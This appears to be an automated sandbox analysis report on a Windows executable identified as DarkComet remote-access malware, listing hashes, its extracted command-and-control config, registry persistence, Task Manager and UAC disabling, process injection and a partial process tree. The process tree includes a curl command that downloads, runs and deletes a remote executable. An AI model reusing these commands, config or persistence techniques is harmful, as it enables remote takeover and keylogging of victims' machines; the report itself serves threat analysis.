Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-12-2024 21:06
Static task
static1
Behavioral task
behavioral1
Sample
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe
Resource
win10v2004-20241007-en
General
-
Target
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe
-
Size
5.3MB
-
MD5
c13d6d5a9aa229499ee0ff1f698a2ee0
-
SHA1
2a7ac214047525c963cfd8d1be692c50bdbb9c46
-
SHA256
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba
-
SHA512
5c9e4b30dbd6c5414ea04a70b109e6dc9f8287affe014e47ed0797ff63ac904223751557e44bff99cf8ecfce3c8b748cef55c1d3db88905431f4049039042059
-
SSDEEP
98304:aOQGc830HeOIk0ons6U523lPWZIERFog7icldle+HJFD4:hrj30qkXnsr2YIIog7if+HJFs
Malware Config
Extracted
darkcomet
GoogleDebugger
147.185.221.24:14161
RO_MUTEX-8HU43EZ
-
InstallPath
ChromeCookies\ChromeCookie.exe
-
gencode
WN0BLB8aPxBw
-
install
true
-
offline_keylogger
true
-
persistence
true
-
reg_key
GoogleDebugJ
Signatures
-
Darkcomet family
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" test.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe,C:\\Windows\\TEMP\\ChromeCookies\\ChromeCookie.exe" IntelGpuUpdater.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1704 attrib.exe 2368 attrib.exe 3672 attrib.exe 736 attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation test.exe -
Executes dropped EXE 12 IoCs
pid Process 2224 test.exe 2448 ChromeCookie.exe 4696 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 1564 IntelGpuUpdater.exe 2340 ChromeCookie.exe 1552 IntelGpuUpdater.exe 3296 IntelGpuUpdater.exe 4324 IntelGpuUpdater.exe 4896 IntelGpuUpdater.exe 3980 IntelGpuUpdater.exe 1788 IntelGpuUpdater.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" test.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" ChromeCookie.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" iexplore.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 708 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2448 set thread context of 2588 2448 ChromeCookie.exe 98 PID 2340 set thread context of 4436 2340 ChromeCookie.exe 127 -
resource yara_rule behavioral2/files/0x000a000000023c12-8.dat upx behavioral2/memory/2224-10-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2588-46-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2448-48-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2224-50-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/1564-60-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2340-97-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/1564-98-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/1552-100-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3296-103-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/4324-105-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/4896-108-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3980-111-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/1788-113-0x0000000000400000-0x00000000004B7000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\IntelGpuUpdater.exe cmd.exe File created C:\Windows\IntelGpuUpdaterHelper.exe cmd.exe File opened for modification C:\Windows\IntelGpuUpdater.exe attrib.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2272 sc.exe 5064 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 39 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChromeCookie.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChromeCookie.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language test.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdaterHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdaterHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4008 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" ChromeCookie.exe Key created \REGISTRY\USER\.DEFAULT\Software\DC3_FEXEC iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000008c69a1e5eb48db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System iexplore.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fReverse = "0" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000b0a59ce5eb48db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft ChromeCookie.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fPasteOriginalEOL = "0" notepad.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fMatchCase = "0" notepad.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fWrapAround = "0" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows ChromeCookie.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 01000000000000008c69a1e5eb48db01 IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{470C0EBD-5D73-4D58-9CED-E91E22E23282} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000008c69a1e5eb48db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\DC3_FEXEC IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{99D353BC-C813-41EC-8F28-EAE61E702E57} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 01000000000000004b079fe5eb48db01 IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000008c69a1e5eb48db01 IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d8d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies ChromeCookie.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fWindowsOnlyEOL = "0" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ test.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 708 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 708 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe 4552 IntelGpuUpdaterHelper.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2224 test.exe Token: SeSecurityPrivilege 2224 test.exe Token: SeTakeOwnershipPrivilege 2224 test.exe Token: SeLoadDriverPrivilege 2224 test.exe Token: SeSystemProfilePrivilege 2224 test.exe Token: SeSystemtimePrivilege 2224 test.exe Token: SeProfSingleProcessPrivilege 2224 test.exe Token: SeIncBasePriorityPrivilege 2224 test.exe Token: SeCreatePagefilePrivilege 2224 test.exe Token: SeBackupPrivilege 2224 test.exe Token: SeRestorePrivilege 2224 test.exe Token: SeShutdownPrivilege 2224 test.exe Token: SeDebugPrivilege 2224 test.exe Token: SeSystemEnvironmentPrivilege 2224 test.exe Token: SeChangeNotifyPrivilege 2224 test.exe Token: SeRemoteShutdownPrivilege 2224 test.exe Token: SeUndockPrivilege 2224 test.exe Token: SeManageVolumePrivilege 2224 test.exe Token: SeImpersonatePrivilege 2224 test.exe Token: SeCreateGlobalPrivilege 2224 test.exe Token: 33 2224 test.exe Token: 34 2224 test.exe Token: 35 2224 test.exe Token: 36 2224 test.exe Token: SeIncreaseQuotaPrivilege 2448 ChromeCookie.exe Token: SeSecurityPrivilege 2448 ChromeCookie.exe Token: SeTakeOwnershipPrivilege 2448 ChromeCookie.exe Token: SeLoadDriverPrivilege 2448 ChromeCookie.exe Token: SeSystemProfilePrivilege 2448 ChromeCookie.exe Token: SeSystemtimePrivilege 2448 ChromeCookie.exe Token: SeProfSingleProcessPrivilege 2448 ChromeCookie.exe Token: SeIncBasePriorityPrivilege 2448 ChromeCookie.exe Token: SeCreatePagefilePrivilege 2448 ChromeCookie.exe Token: SeBackupPrivilege 2448 ChromeCookie.exe Token: SeRestorePrivilege 2448 ChromeCookie.exe Token: SeShutdownPrivilege 2448 ChromeCookie.exe Token: SeDebugPrivilege 2448 ChromeCookie.exe Token: SeSystemEnvironmentPrivilege 2448 ChromeCookie.exe Token: SeChangeNotifyPrivilege 2448 ChromeCookie.exe Token: SeRemoteShutdownPrivilege 2448 ChromeCookie.exe Token: SeUndockPrivilege 2448 ChromeCookie.exe Token: SeManageVolumePrivilege 2448 ChromeCookie.exe Token: SeImpersonatePrivilege 2448 ChromeCookie.exe Token: SeCreateGlobalPrivilege 2448 ChromeCookie.exe Token: 33 2448 ChromeCookie.exe Token: 34 2448 ChromeCookie.exe Token: 35 2448 ChromeCookie.exe Token: 36 2448 ChromeCookie.exe Token: SeIncreaseQuotaPrivilege 2588 iexplore.exe Token: SeSecurityPrivilege 2588 iexplore.exe Token: SeTakeOwnershipPrivilege 2588 iexplore.exe Token: SeLoadDriverPrivilege 2588 iexplore.exe Token: SeSystemProfilePrivilege 2588 iexplore.exe Token: SeSystemtimePrivilege 2588 iexplore.exe Token: SeProfSingleProcessPrivilege 2588 iexplore.exe Token: SeIncBasePriorityPrivilege 2588 iexplore.exe Token: SeCreatePagefilePrivilege 2588 iexplore.exe Token: SeBackupPrivilege 2588 iexplore.exe Token: SeRestorePrivilege 2588 iexplore.exe Token: SeShutdownPrivilege 2588 iexplore.exe Token: SeDebugPrivilege 2588 iexplore.exe Token: SeSystemEnvironmentPrivilege 2588 iexplore.exe Token: SeChangeNotifyPrivilege 2588 iexplore.exe Token: SeRemoteShutdownPrivilege 2588 iexplore.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2588 iexplore.exe 4436 iexplore.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 708 wrote to memory of 380 708 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 84 PID 708 wrote to memory of 380 708 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 84 PID 708 wrote to memory of 380 708 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 84 PID 380 wrote to memory of 1740 380 cmd.exe 85 PID 380 wrote to memory of 1740 380 cmd.exe 85 PID 380 wrote to memory of 1740 380 cmd.exe 85 PID 708 wrote to memory of 3788 708 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 86 PID 708 wrote to memory of 3788 708 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 86 PID 708 wrote to memory of 3788 708 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 86 PID 3788 wrote to memory of 4032 3788 cmd.exe 87 PID 3788 wrote to memory of 4032 3788 cmd.exe 87 PID 3788 wrote to memory of 4032 3788 cmd.exe 87 PID 4032 wrote to memory of 2632 4032 cmd.exe 88 PID 4032 wrote to memory of 2632 4032 cmd.exe 88 PID 4032 wrote to memory of 2632 4032 cmd.exe 88 PID 4032 wrote to memory of 2224 4032 cmd.exe 89 PID 4032 wrote to memory of 2224 4032 cmd.exe 89 PID 4032 wrote to memory of 2224 4032 cmd.exe 89 PID 4032 wrote to memory of 4008 4032 cmd.exe 90 PID 4032 wrote to memory of 4008 4032 cmd.exe 90 PID 4032 wrote to memory of 4008 4032 cmd.exe 90 PID 2224 wrote to memory of 1936 2224 test.exe 91 PID 2224 wrote to memory of 1936 2224 test.exe 91 PID 2224 wrote to memory of 1936 2224 test.exe 91 PID 2224 wrote to memory of 4568 2224 test.exe 93 PID 2224 wrote to memory of 4568 2224 test.exe 93 PID 2224 wrote to memory of 4568 2224 test.exe 93 PID 1936 wrote to memory of 1704 1936 cmd.exe 95 PID 1936 wrote to memory of 1704 1936 cmd.exe 95 PID 1936 wrote to memory of 1704 1936 cmd.exe 95 PID 4568 wrote to memory of 2368 4568 cmd.exe 96 PID 4568 wrote to memory of 2368 4568 cmd.exe 96 PID 4568 wrote to memory of 2368 4568 cmd.exe 96 PID 2224 wrote to memory of 2448 2224 test.exe 97 PID 2224 wrote to memory of 2448 2224 test.exe 97 PID 2224 wrote to memory of 2448 2224 test.exe 97 PID 2448 wrote to memory of 2588 2448 ChromeCookie.exe 98 PID 2448 wrote to memory of 2588 2448 ChromeCookie.exe 98 PID 2448 wrote to memory of 2588 2448 ChromeCookie.exe 98 PID 2448 wrote to memory of 2588 2448 ChromeCookie.exe 98 PID 2448 wrote to memory of 2588 2448 ChromeCookie.exe 98 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 2588 wrote to memory of 2532 2588 iexplore.exe 99 PID 708 wrote to memory of 1544 708 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe 100 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 1704 attrib.exe 2368 attrib.exe 3672 attrib.exe 736 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe"C:\Users\Admin\AppData\Local\Temp\03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && " > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\SysWOW64\cmd.execmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "3⤵
- System Location Discovery: System Language Discovery
PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "curl https://dontuseme.ct8.pl/test.exe > %localappdata%\test.exe && start %localappdata%\test.exe && timeout 5 && del %localappdata%\test.exe" > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\SysWOW64\cmd.execmd /c "curl https://dontuseme.ct8.pl/test.exe > C:\Users\Admin\AppData\Local\test.exe && start C:\Users\Admin\AppData\Local\test.exe && timeout 5 && del C:\Users\Admin\AppData\Local\test.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/test.exe4⤵
- System Location Discovery: System Language Discovery
PID:2632
-
-
C:\Users\Admin\AppData\Local\test.exeC:\Users\Admin\AppData\Local\test.exe4⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
